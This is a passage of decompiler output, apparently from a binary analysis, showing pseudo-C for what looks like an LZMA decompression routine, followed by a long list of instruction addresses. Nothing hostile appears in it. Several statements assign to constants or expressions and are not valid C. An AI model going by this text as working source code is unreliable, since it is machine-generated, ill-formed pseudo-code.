												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                                                                            0x00406d5a
                                                                            0x00406d5a
                                                                            0x00406d5a
                                                                            0x00406d5a
                                                                            0x00406d60
                                                                            0x00406d64
                                                                            0x00406d68
                                                                            0x00406d72
                                                                            0x00406d80
                                                                            0x00407056
                                                                            0x00407056
                                                                            0x00407059
                                                                            0x00407060
                                                                            0x0040708d
                                                                            0x0040708d
                                                                            0x00407091
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407093
                                                                            0x0040709c
                                                                            0x004070a2
                                                                            0x004070a5
                                                                            0x004070a8
                                                                            0x004070ab
                                                                            0x004070ae
                                                                            0x004070b4
                                                                            0x004070cd
                                                                            0x004070d0
                                                                            0x004070dc
                                                                            0x004070dd
                                                                            0x004070e0
                                                                            0x004070b6
                                                                            0x004070b6
                                                                            0x004070c5
                                                                            0x004070c8
                                                                            0x004070c8
                                                                            0x004070ea
                                                                            0x0040708a
                                                                            0x0040708a
                                                                            0x0040708a
                                                                            0x0040708d
                                                                            0x00407091
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004070ec
                                                                            0x004070ec
                                                                            0x00407065
                                                                            0x00407069
                                                                            0x004071a1
                                                                            0x004071a1
                                                                            0x004071ab
                                                                            0x004071b3
                                                                            0x004071ba
                                                                            0x004071bc
                                                                            0x004071c3
                                                                            0x004071c7
                                                                            0x004071c7
                                                                            0x0040706f
                                                                            0x00407075
                                                                            0x0040707c
                                                                            0x00407084
                                                                            0x00407084
                                                                            0x00407087
                                                                            0x00000000
                                                                            0x00407087
                                                                            0x004070f1
                                                                            0x004070fe
                                                                            0x00407101
                                                                            0x0040700d
                                                                            0x0040700d
                                                                            0x0040700d
                                                                            0x004067a9
                                                                            0x004067a9
                                                                            0x004067a9
                                                                            0x004067b2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004067b8
                                                                            0x004067b8
                                                                            0x00000000
                                                                            0x004067bf
                                                                            0x004067c3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004067c9
                                                                            0x004067cc
                                                                            0x004067cf
                                                                            0x004067d2
                                                                            0x004067d6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004067dc
                                                                            0x004067dc
                                                                            0x004067df
                                                                            0x004067e1
                                                                            0x004067e2
                                                                            0x004067e5
                                                                            0x004067e7
                                                                            0x004067e8
                                                                            0x004067ea
                                                                            0x004067ed
                                                                            0x004067f2
                                                                            0x004067f7
                                                                            0x00406800
                                                                            0x00406813
                                                                            0x00406816
                                                                            0x00406822
                                                                            0x0040684a
                                                                            0x0040684c
                                                                            0x0040685a
                                                                            0x0040685a
                                                                            0x0040685e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040684e
                                                                            0x0040684e
                                                                            0x00406851
                                                                            0x00406852
                                                                            0x00406852
                                                                            0x00000000
                                                                            0x0040684e
                                                                            0x00406824
                                                                            0x00406828
                                                                            0x0040682d
                                                                            0x0040682d
                                                                            0x00406836
                                                                            0x0040683e
                                                                            0x00406841
                                                                            0x00000000
                                                                            0x00406847
                                                                            0x00406847
                                                                            0x00000000
                                                                            0x00406847
                                                                            0x00000000
                                                                            0x00406864
                                                                            0x00406864
                                                                            0x00406868
                                                                            0x00407114
                                                                            0x00407114
                                                                            0x00000000
                                                                            0x00407114
                                                                            0x0040686e
                                                                            0x00406871
                                                                            0x00406881
                                                                            0x00406884
                                                                            0x00406887
                                                                            0x00406887
                                                                            0x00406887
                                                                            0x0040688a
                                                                            0x0040688e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406890
                                                                            0x00406890
                                                                            0x00406896
                                                                            0x004068c0
                                                                            0x004068c6
                                                                            0x004068cd
                                                                            0x00000000
                                                                            0x004068cd
                                                                            0x00406898
                                                                            0x0040689c
                                                                            0x0040689f
                                                                            0x004068a4
                                                                            0x004068a4
                                                                            0x004068af
                                                                            0x004068b7
                                                                            0x004068ba
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004068ff
                                                                            0x00406905
                                                                            0x00406908
                                                                            0x00406915
                                                                            0x0040691d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004068d4
                                                                            0x004068d4
                                                                            0x004068d8
                                                                            0x00407123
                                                                            0x00407123
                                                                            0x00000000
                                                                            0x00407123
                                                                            0x004068de
                                                                            0x004068e4
                                                                            0x004068ef
                                                                            0x004068ef
                                                                            0x004068ef
                                                                            0x004068f2
                                                                            0x004068f5
                                                                            0x004068f8
                                                                            0x004068fd
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f94
                                                                            0x00406f94
                                                                            0x00406f9a
                                                                            0x00406fa0
                                                                            0x00406fa6
                                                                            0x00406fc0
                                                                            0x00406fc3
                                                                            0x00406fc9
                                                                            0x00406fd4
                                                                            0x00406fd4
                                                                            0x00406fd6
                                                                            0x00406fa8
                                                                            0x00406fa8
                                                                            0x00406fb7
                                                                            0x00406fbb
                                                                            0x00406fbb
                                                                            0x00406fe0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406fe2
                                                                            0x00406fe6
                                                                            0x00407195
                                                                            0x00407195
                                                                            0x00000000
                                                                            0x00407195
                                                                            0x00406fec
                                                                            0x00406ff2
                                                                            0x00406ff9
                                                                            0x00407001
                                                                            0x00407004
                                                                            0x00407007
                                                                            0x00407007
                                                                            0x0040700d
                                                                            0x0040700d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406925
                                                                            0x00406925
                                                                            0x00406927
                                                                            0x0040692a
                                                                            0x0040699b
                                                                            0x0040699b
                                                                            0x0040699e
                                                                            0x004069a1
                                                                            0x004069a8
                                                                            0x004069b2
                                                                            0x00000000
                                                                            0x004069b2
                                                                            0x0040692c
                                                                            0x0040692c
                                                                            0x00406930
                                                                            0x00406933
                                                                            0x00406935
                                                                            0x00406938
                                                                            0x0040693b
                                                                            0x0040693d
                                                                            0x00406940
                                                                            0x00406942
                                                                            0x00406947
                                                                            0x0040694a
                                                                            0x0040694d
                                                                            0x00406951
                                                                            0x00406958
                                                                            0x0040695b
                                                                            0x00406962
                                                                            0x00406966
                                                                            0x0040696e
                                                                            0x0040696e
                                                                            0x0040696e
                                                                            0x00406968
                                                                            0x00406968
                                                                            0x00406968
                                                                            0x0040695d
                                                                            0x0040695d
                                                                            0x0040695d
                                                                            0x00406972
                                                                            0x00406975
                                                                            0x00406993
                                                                            0x00406993
                                                                            0x00406995
                                                                            0x00000000
                                                                            0x00406977
                                                                            0x00406977
                                                                            0x00406977
                                                                            0x0040697a
                                                                            0x0040697d
                                                                            0x00406980
                                                                            0x00406982
                                                                            0x00406982
                                                                            0x00406982
                                                                            0x00406985
                                                                            0x00406988
                                                                            0x0040698a
                                                                            0x0040698b
                                                                            0x0040698e
                                                                            0x00000000
                                                                            0x0040698e
                                                                            0x00000000
                                                                            0x00406bc4
                                                                            0x00406bc4
                                                                            0x00406bc8
                                                                            0x00406be6
                                                                            0x00406be6
                                                                            0x00406be9
                                                                            0x00406bf0
                                                                            0x00406bf3
                                                                            0x00406bf6
                                                                            0x00406bf9
                                                                            0x00406bfc
                                                                            0x00406bff
                                                                            0x00406c01
                                                                            0x00406c08
                                                                            0x00406c09
                                                                            0x00406c0b
                                                                            0x00406c0e
                                                                            0x00406c11
                                                                            0x00406c14
                                                                            0x00406c14
                                                                            0x00406c19
                                                                            0x00000000
                                                                            0x00406c19
                                                                            0x00406bca
                                                                            0x00406bca
                                                                            0x00406bcd
                                                                            0x00406bd0
                                                                            0x00406bda
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c2e
                                                                            0x00406c2e
                                                                            0x00406c32
                                                                            0x00406c55
                                                                            0x00406c58
                                                                            0x00406c5b
                                                                            0x00406c65
                                                                            0x00406c34
                                                                            0x00406c34
                                                                            0x00406c37
                                                                            0x00406c3a
                                                                            0x00406c3d
                                                                            0x00406c4a
